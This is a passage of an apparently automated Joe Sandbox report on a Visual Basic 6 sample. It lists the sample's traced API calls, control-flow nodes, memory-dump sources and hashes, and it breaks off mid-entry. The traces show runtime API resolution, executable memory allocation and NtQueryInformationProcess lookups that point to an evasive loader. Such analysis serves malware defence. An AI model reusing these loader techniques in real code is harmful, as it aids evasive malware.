                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00401526,?,?,?,?,?,?,?,?,-00000004,?,?,?), ref: 0054CC9B
                                                                    • #644.MSVBVM60(?,?,?,?,00401526,?,?,?,?,?,?,?,?,-00000004,?,?), ref: 0054CCB1
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00401526,?,?,?,?,?,?,?,?,-00000004,?), ref: 0054CCBD
                                                                    • __vbaI4Var.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401526,?,?,?,?,?,?), ref: 0054CCD9
                                                                    • __vbaVarMove.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401526,?,?,?), ref: 0054CCF7
                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401526,?,?,?), ref: 0054CCFF
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054CD3B,?,00000000,?,?,00000000,?,?,?,?,?,?,00401526,?), ref: 0054CD35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$ChkstkLockUnlock$FreeMove$AllocDestructNofreeRedimVargVirtual
                                                                    • String ID:
                                                                    • API String ID: 2337634516-0
                                                                    • Opcode ID: 495222ed75ca7685274d3f831d9005dc762c1344a2d7a4b32183b035c66987ce
                                                                    • Instruction ID: 6293dab0e36c9b952509f9bd3a673a9423ced826363ee4a084a0efce887c3bcc
                                                                    • Opcode Fuzzy Hash: 495222ed75ca7685274d3f831d9005dc762c1344a2d7a4b32183b035c66987ce
                                                                    • Instruction Fuzzy Hash: CB51E6B1D01249AFDF04EFE5CD86EEEBBB9EF04304F14442AF501BB2A1D679A9058B14

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 756 5c7404-5c7442 __vbaChkstk call 549b21 * 2 761 5c745c 756->761 762 5c7444-5c745a __vbaNew2 756->762 763 5c7463-5c74c0 __vbaChkstk * 2 761->763 762->763 765 5c74dc 763->765 766 5c74c2-5c74da __vbaHresultCheckObj 763->766 767 5c74e0-5c74e7 765->767 766->767 768 5c74e9-5c74ff __vbaNew2 767->768 769 5c7501 767->769 770 5c7508-5c7517 768->770 769->770 771 5c7519-5c752f __vbaNew2 770->771 772 5c7531 770->772 773 5c7538-5c755b __vbaObjSetAddref 771->773 772->773 775 5c755d-5c7572 __vbaHresultCheckObj 773->775 776 5c7574 773->776 777 5c7578-5c7580 __vbaFreeObj call 5c75a5 775->777 776->777 779 5c7585-5c7595 777->779
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,005C553A,?,?,?,?,00401526), ref: 005C741F
                                                                    • __vbaNew2.MSVBVM60(0040839C,005C9300,?,?,?,00000000,00401526,?,?,?,005C553A), ref: 005C744E
                                                                    • __vbaChkstk.MSVBVM60 ref: 005C748A
                                                                    • __vbaChkstk.MSVBVM60 ref: 005C749B
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B5C4,000002B0), ref: 005C74D2
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C74F3
                                                                    • __vbaNew2.MSVBVM60(0040839C,005C9300), ref: 005C7523
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 005C7541
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C756A
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C757B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkNew2$CheckHresult$AddrefFree
                                                                    • String ID:
                                                                    • API String ID: 2042159070-0
                                                                    • Opcode ID: 76bf631e61de1b167c3174e80b57effb729768875388a7f6e215214489d6fa69
                                                                    • Instruction ID: 66ffeba6f411a64e52c688429e61e61fd3b19f861553908431b088cab20c5698
                                                                    • Opcode Fuzzy Hash: 76bf631e61de1b167c3174e80b57effb729768875388a7f6e215214489d6fa69
                                                                    • Instruction Fuzzy Hash: FD41D0B0904608EFCB10EFD1D88AF9DBFB5BB09708F20082AF0017A6A1C7B95944DF55

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 821 5c738d-5c73cb __vbaChkstk call 40ae40 823 5c73d0-5c73e5 __vbaSetSystemError 821->823
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2CC,?,?,?,?,?,?,00401526), ref: 005C73A8
                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401526), ref: 005C73D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkErrorSystem
                                                                    • String ID: 0
                                                                    • API String ID: 2242893769-4108050209
                                                                    • Opcode ID: 224de5bf81c1a739f28e14e45bf58c6758a462538f1e7a0cdf26763425c64e60
                                                                    • Instruction ID: e558a696766fdc1434adbcb20caa17b6e33493bbbaa160aa73e3dcff6563a554
                                                                    • Opcode Fuzzy Hash: 224de5bf81c1a739f28e14e45bf58c6758a462538f1e7a0cdf26763425c64e60
                                                                    • Instruction Fuzzy Hash: A9E0E5B1540348BAD600DBC5CD47F5ABAACE709F54F50462EF500B70D0C3BC2E00866A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054B26B
                                                                      • Part of subcall function 005C732C: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2B6,?,?,?,?,?,00401526), ref: 005C7347
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401526), ref: 0054B2B9
                                                                      • Part of subcall function 0054B868: __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054B2C3,?,?,?,?,?,00401526), ref: 0054B885
                                                                      • Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8A1
                                                                      • Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8AB
                                                                      • Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8B6
                                                                      • Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8C0
                                                                      • Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8CB
                                                                      • Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8D5
                                                                      • Part of subcall function 0054B868: #644.MSVBVM60(00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3), ref: 0054B8DB
                                                                      • Part of subcall function 0054B868: GetModuleHandleW.KERNEL32(00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526), ref: 0054B8E1
                                                                      • Part of subcall function 0054B868: __vbaFreeStrList.MSVBVM60(00000003,?,00401526,00000000,00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000), ref: 0054B8F9
                                                                      • Part of subcall function 0054B868: __vbaChkstk.MSVBVM60 ref: 0054B918
                                                                      • Part of subcall function 0054B868: __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054B93A
                                                                      • Part of subcall function 0054B868: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054B944
                                                                      • Part of subcall function 0054B868: GetProcAddress.KERNEL32(00000000,?), ref: 0054B950
                                                                      • Part of subcall function 0054B868: __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B964
                                                                      • Part of subcall function 0054B868: __vbaFreeVar.MSVBVM60 ref: 0054B96F
                                                                      • Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A728,0040A71C), ref: 0054B97E
                                                                      • Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A728,0040A71C), ref: 0054B988
                                                                      • Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B993
                                                                      • Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B99D
                                                                      • Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A74C,00000000,0040A738,00000000,0040A728,0040A71C), ref: 0054B9A8
                                                                      • Part of subcall function 005C738D: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2CC,?,?,?,?,?,?,00401526), ref: 005C73A8
                                                                      • Part of subcall function 005C738D: __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401526), ref: 005C73D0
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054B2CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkFreeMove$List$#644AddressAnsiErrorHandleModuleProcSystem
                                                                    • String ID:
                                                                    • API String ID: 1084042792-0
                                                                    • Opcode ID: cc2a8aa4748b8dca2cfd4d9f34ecb9c4e1b35a3afcf6c34f7ed8b7b8864a6561
                                                                    • Instruction ID: 9d38cc2ca50dd174c24a639c31348b4a5c1f02d4dbf976ecda8e982e0c0775e9
                                                                    • Opcode Fuzzy Hash: cc2a8aa4748b8dca2cfd4d9f34ecb9c4e1b35a3afcf6c34f7ed8b7b8864a6561
                                                                    • Instruction Fuzzy Hash: 1001ED71804208ABCB00EFE5D94BFCDBFB8FF48744F508466F404AB262D775AA049B95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C5507
                                                                      • Part of subcall function 005C7404: __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,005C553A,?,?,?,?,00401526), ref: 005C741F
                                                                      • Part of subcall function 005C7404: __vbaNew2.MSVBVM60(0040839C,005C9300,?,?,?,00000000,00401526,?,?,?,005C553A), ref: 005C744E
                                                                      • Part of subcall function 005C7404: __vbaChkstk.MSVBVM60 ref: 005C748A
                                                                      • Part of subcall function 005C7404: __vbaChkstk.MSVBVM60 ref: 005C749B
                                                                      • Part of subcall function 005C7404: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B5C4,000002B0), ref: 005C74D2
                                                                      • Part of subcall function 005C7404: __vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C74F3
                                                                      • Part of subcall function 005C7404: __vbaNew2.MSVBVM60(0040839C,005C9300), ref: 005C7523
                                                                      • Part of subcall function 005C7404: __vbaObjSetAddref.MSVBVM60(?,?), ref: 005C7541
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Chkstk$New2$AddrefCheckHresult
                                                                    • String ID:
                                                                    • API String ID: 1889392896-0
                                                                    • Opcode ID: 7a3662d7ac2d259d3bab7adf219b3faf752365e48d0f2bf5c0c82855049e8e52
                                                                    • Instruction ID: 52bd1f6ccf9741527c0dcc8a68ca2579c258335835e1ef9704ea5c3140b3a5bc
                                                                    • Opcode Fuzzy Hash: 7a3662d7ac2d259d3bab7adf219b3faf752365e48d0f2bf5c0c82855049e8e52
                                                                    • Instruction Fuzzy Hash: 610116B2A00648EFCB01DF58D946B8DBFB4FB45740F10846AF8099B262D338AA40CB95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2B6,?,?,?,?,?,00401526), ref: 005C7347
                                                                      • Part of subcall function 0054AA9F: NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess), ref: 0054AB36
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateChkstkMemoryVirtual__vba
                                                                    • String ID:
                                                                    • API String ID: 3513745053-0
                                                                    • Opcode ID: d3b99f7ad3e6096f9accf6d527ca79fa98a0bcc638b55834b5a4a1af462c1307
                                                                    • Instruction ID: 0eee817b2e13f813bcddde360cc419012536c81f810b8dd82a2ddb785c1320f7
                                                                    • Opcode Fuzzy Hash: d3b99f7ad3e6096f9accf6d527ca79fa98a0bcc638b55834b5a4a1af462c1307
                                                                    • Instruction Fuzzy Hash: 12D0C2B1490788BEC2009B868D07F5EBEACF749F44F10081EF001676D0D2B86900956A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 0-2781105232
                                                                    • Opcode ID: d68e2f914ae852ca0d680da02795a2dacfd7c268fcf049671a1f24f741c7abf0
                                                                    • Instruction ID: e3107e904df1ba66677652666e8e4b38ce91503cbac552bcbe260d2d7eb132dc
                                                                    • Opcode Fuzzy Hash: d68e2f914ae852ca0d680da02795a2dacfd7c268fcf049671a1f24f741c7abf0
                                                                    • Instruction Fuzzy Hash: 20F0A030FD4111AEDAA06A24CC4EFA62F94BB44B5EF60D861F44AEA9A2D664DC009103
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
                                                                    • Instruction ID: 2aea7a4f82491d4c6a733bf6f1f3d9c33c55ac2891d59de2e93f290f71fea994
                                                                    • Opcode Fuzzy Hash: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
                                                                    • Instruction Fuzzy Hash: DE01D132604106CBEB30AB18C04C9EBBBA2FB7136AF950422D92D47B10D322EA84C602
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
                                                                    • Instruction ID: d6a2856037c5c2d27f7496a81703d06248cee415ff28095efdbdd62383931441
                                                                    • Opcode Fuzzy Hash: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
                                                                    • Instruction Fuzzy Hash: 17F039326385109FCB20DB99D450A6AB3E9EBC07707154899E4899BE04CB31FC808AD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
                                                                    • Instruction ID: 95dff2fb833417202495218693bf5b1a421dd4471ca0001524ddc04ad995461f
                                                                    • Opcode Fuzzy Hash: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
                                                                    • Instruction Fuzzy Hash: 46B0123F0716C44DDB13CF3442137E93B6593004C0F5404C1D0C04B66BC00C8687D556
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
                                                                    • Instruction ID: 75d8ee55a9432d655d400c20f764b696a43bdfdc0ccd3be24d65f6ea96f8add4
                                                                    • Opcode Fuzzy Hash: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
                                                                    • Instruction Fuzzy Hash: 0CB012241015C18EC9024F1041127A877A0D7019C0F0A00C494C04B513C11C8645A610
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8207d9338d48eaa58bcf894091f273c5f1ba2291a3dcab0922542a31be3f470
                                                                    • Instruction ID: 60e63de5957a7f3aeb45ddbd144c15dbf272bc1d6ba1101bf083e3e75a9a2faf
                                                                    • Opcode Fuzzy Hash: a8207d9338d48eaa58bcf894091f273c5f1ba2291a3dcab0922542a31be3f470
                                                                    • Instruction Fuzzy Hash: 5AB09230139580CFC2428B59C264A6073B8F704700F4500F1E4068FE16C7649900CA04
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f359a15aac9bef16dcbf83513692feeeafd97e242589ab4c61242ee1ba63dd7
                                                                    • Instruction ID: ee6421c3e0f9259548521485bdc7f11415b788ce3c3e13c3d828d4159024246d
                                                                    • Opcode Fuzzy Hash: 0f359a15aac9bef16dcbf83513692feeeafd97e242589ab4c61242ee1ba63dd7
                                                                    • Instruction Fuzzy Hash: E1B00235179540CFC2569B45D594A5473B8F744741F4554E1E4055BA558264AE40CA05
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1aa5735e108945feb1cebb53304a7166d55ff265eb412e5f8c8853dcbd5da360
                                                                    • Instruction ID: 39d0f3623eda289cf508d0a152de483eeabff0fbdc6ae6db4e255b003425720a
                                                                    • Opcode Fuzzy Hash: 1aa5735e108945feb1cebb53304a7166d55ff265eb412e5f8c8853dcbd5da360
                                                                    • Instruction Fuzzy Hash: F3B00135266980CFD296DB0AC294F6073F8FB04A41F4A64F0E4498BA62C738A901CA40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bac31205334e0f9ffc6cdac357d75172e52d2a21de088034a7fa3c621bcab9d
                                                                    • Instruction ID: b80a7974f19584570e9af62b94816b8d0283ee71a2bc7a9517126b21d8e92f41
                                                                    • Opcode Fuzzy Hash: 5bac31205334e0f9ffc6cdac357d75172e52d2a21de088034a7fa3c621bcab9d
                                                                    • Instruction Fuzzy Hash: 53B00135266980CFC296CB0AC198F5073B8FB04B41F4614F1E4059BA62C338AD00CA00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dffa6fee49b029f388ee73941731a714f6e7632120a45cd52975d1a5ab74826e
                                                                    • Instruction ID: d535b6adde154685a07659a06dc348d53ef730e932a4fbefb0bcfc4142d63306
                                                                    • Opcode Fuzzy Hash: dffa6fee49b029f388ee73941731a714f6e7632120a45cd52975d1a5ab74826e
